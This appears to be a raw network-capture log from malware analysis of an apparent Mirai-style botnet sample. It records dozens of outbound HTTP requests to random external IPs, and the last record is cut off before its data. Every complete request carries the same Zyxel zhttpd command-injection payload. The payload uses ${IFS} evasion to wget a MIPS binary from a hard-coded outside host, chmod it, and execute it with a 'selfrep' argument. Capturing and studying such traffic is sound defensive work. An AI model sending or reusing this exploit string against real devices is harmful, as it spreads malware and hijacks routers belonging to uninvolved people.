                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9445192.168.2.135035651.97.133.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651140928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9446192.168.2.1346768194.142.133.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651215076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9447192.168.2.133952832.143.107.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651253939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9448192.168.2.1346022199.72.90.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651300907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9449192.168.2.1346984145.160.156.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651376009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9450192.168.2.1345046182.156.190.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651427984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9451192.168.2.1344158173.169.56.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651489019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9452192.168.2.13594505.125.141.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651498079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9453192.168.2.133782498.194.3.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651587009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9454192.168.2.1341310165.105.105.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651659966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9455192.168.2.133336042.209.68.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651722908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9456192.168.2.1333928103.8.42.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651794910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9457192.168.2.13530324.112.169.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651853085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9458192.168.2.1348266160.162.215.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651887894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9459192.168.2.134443847.206.47.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651925087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9460192.168.2.1339292165.78.201.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651953936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9461192.168.2.135394877.99.191.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652060032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9462192.168.2.1347508126.124.217.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652112007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9463192.168.2.1343024194.255.254.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652153969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9464192.168.2.1358414137.134.3.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652221918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9465192.168.2.134385286.181.4.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652273893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9466192.168.2.1355708144.207.176.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652328014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9467192.168.2.1336096211.185.119.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652384996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9468192.168.2.1349944219.53.106.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652405977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9469192.168.2.1339196211.124.163.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652468920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9470192.168.2.1346838173.220.22.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652539015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9471192.168.2.1354100130.252.253.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652597904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9472192.168.2.1334310101.7.209.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652657032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9473192.168.2.1339366106.148.95.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652705908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9474192.168.2.1355036120.216.155.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652767897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9475192.168.2.133372894.7.2.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652822971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9476192.168.2.1354802218.253.121.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652885914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9477192.168.2.13567984.213.19.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.652949095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9478192.168.2.135649282.240.191.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653009892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9479192.168.2.1337600202.158.194.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653079987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9480192.168.2.1337166176.55.137.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653137922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9481192.168.2.1347872106.151.9.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653181076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9482192.168.2.1354210148.34.59.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653258085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9483192.168.2.1349572156.34.192.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653321028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9484192.168.2.135572868.31.142.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653383970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9485192.168.2.134980825.215.72.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653414011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9486192.168.2.1356622172.42.199.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653466940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9487192.168.2.134184089.61.124.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653533936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9488192.168.2.1359998126.243.173.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653597116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9489192.168.2.134795065.94.46.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653652906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9490192.168.2.135337491.53.6.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653709888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9491192.168.2.1337108199.177.229.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653780937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9492192.168.2.134958279.84.99.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653876066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9493192.168.2.135810698.253.139.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653923988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9494192.168.2.134177441.91.157.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.653987885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9495192.168.2.1354484200.51.139.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654045105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9496192.168.2.1354508209.147.196.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654098988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9497192.168.2.135844869.9.136.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654139042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9498192.168.2.134711274.134.84.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654210091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9499192.168.2.1344896170.191.252.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654269934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9500192.168.2.13510249.114.104.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654305935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9501192.168.2.1342266178.219.194.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654371977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9502192.168.2.135701836.188.116.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654427052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9503192.168.2.1343352170.119.13.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654514074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9504192.168.2.1360402204.191.40.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654581070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9505192.168.2.1334098162.61.99.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654628038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9506192.168.2.133389869.140.171.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654695034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9507192.168.2.135318465.117.15.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654752970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9508192.168.2.135042249.205.144.185443
                                    TimestampBytes transferredDirectionData
